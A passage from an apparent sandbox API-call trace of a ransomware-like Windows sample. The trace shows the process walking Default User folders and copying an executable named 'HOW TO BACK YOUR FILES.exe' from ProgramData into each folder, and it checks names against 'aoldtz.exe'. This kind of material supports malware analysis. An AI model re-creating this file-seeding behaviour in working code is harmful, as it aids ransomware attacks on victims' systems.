lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.502] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.502] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0042.502] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.502] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.502] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.502] GetLastError () returned 0x0 [0042.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.502] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.503] CloseHandle (hObject=0x118) returned 1 [0042.503] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.503] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.503] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.503] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.503] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.503] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0042.503] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.503] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.504] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.504] GetLastError () returned 0x0 [0042.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.504] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.504] CloseHandle (hObject=0x118) returned 1 [0042.505] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.505] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.505] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.505] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.505] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.505] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0042.505] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.505] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.506] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.506] GetLastError () returned 0x0 [0042.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.506] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.506] CloseHandle (hObject=0x118) returned 1 [0042.506] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.506] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.507] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.507] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.507] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.507] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0042.507] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.507] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.507] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.507] GetLastError () returned 0x0 [0042.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.507] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.508] CloseHandle (hObject=0x118) returned 1 [0042.508] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.508] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.508] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.508] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.508] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.508] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft" [0042.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.509] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.509] GetLastError () returned 0x0 [0042.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.509] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.509] CloseHandle (hObject=0x118) returned 1 [0042.509] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.509] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.509] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.509] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.509] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.509] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.509] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.509] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.510] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.510] GetLastError () returned 0x0 [0042.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.510] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.510] CloseHandle (hObject=0x118) returned 1 [0042.510] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.510] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.510] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.510] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.510] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.511] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.511] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.511] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.511] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.511] GetLastError () returned 0x0 [0042.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.511] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.511] CloseHandle (hObject=0x118) returned 1 [0042.511] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.511] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.512] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.512] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.512] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.512] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.512] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.512] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.512] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.512] GetLastError () returned 0x0 [0042.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.512] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.513] CloseHandle (hObject=0x118) returned 1 [0042.513] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.513] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.513] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.513] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.513] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.513] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.513] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.513] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.514] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.514] GetLastError () returned 0x0 [0042.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.514] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, 